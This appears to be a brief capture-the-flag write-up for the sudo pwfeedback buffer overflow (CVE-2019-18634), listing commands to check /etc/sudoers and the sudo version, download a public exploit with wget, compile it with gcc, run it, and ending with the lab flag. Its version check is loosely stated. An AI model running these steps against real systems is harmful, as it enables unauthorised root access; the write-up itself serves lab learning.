CVE-2019-18634 (Sudo Buffer Overflow)

Identify:

cat /etc/sudoers

if you see “pwfeedback” (the **** that appear when you start typing passwords = enabled), then you can try this exploit:

If you can’t run cat sudoers, you can check the version:

sudo -V

If version is 1.8.2, then it can be done

Exploit:

Embed GitHub

get it:

wget https://github.com/saleemrashid/sudo-cve-2019-18634/blob/master/exploit.c

compile:

gcc -o <output-file> <source-file>

gcc -o exploit exploit.c

run:

./exploit

Flag:

THM{buff3r_0v3rfl0w_rul3s}